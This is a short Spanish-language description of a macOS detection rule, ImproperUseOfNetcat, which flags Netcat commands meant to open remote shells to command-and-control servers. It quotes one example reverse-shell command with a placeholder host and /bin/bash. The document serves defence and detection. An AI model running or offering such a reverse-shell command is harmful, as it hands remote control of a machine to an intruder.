La analítica ImproperUseOfNetcat detectará la ejecución de comandos de Netcat usados habitualmente para iniciar sesiones de shell remota donde se ha especificado un argumento de proceso sospechoso y no admitido.
Los actores de las amenazas usan con frecuencia Netcat para establecer conexiones de red entre terminales y sesiones remotas con servidores C2 (mando y control) una vez que tienen presencia dentro de una red. Una sesión remota permite al actor de una amenaza comunicarse y controlar la terminal anfitriona desde fuera de la red. En otros sistemas Unix, se puede usar el argumento -E con Netcat para ejecutar un programa específico a través de la conexión remota, como nc <malicious_ip> <port> -E /bin/bash. Sin embargo, Netcat en macOS no admite el argumento -E, y su uso fallido es una indicación de intención maliciosa. Tanto los testeadores de penetración como los actores de amenazas reales suelen cometer este error.
Para más información sobre este tipo de amenaza, consulte Táctica ATT&CK de MITRE: Movimiento Lateral y Técnica MITRE ATT&CK: Servicios Remotos.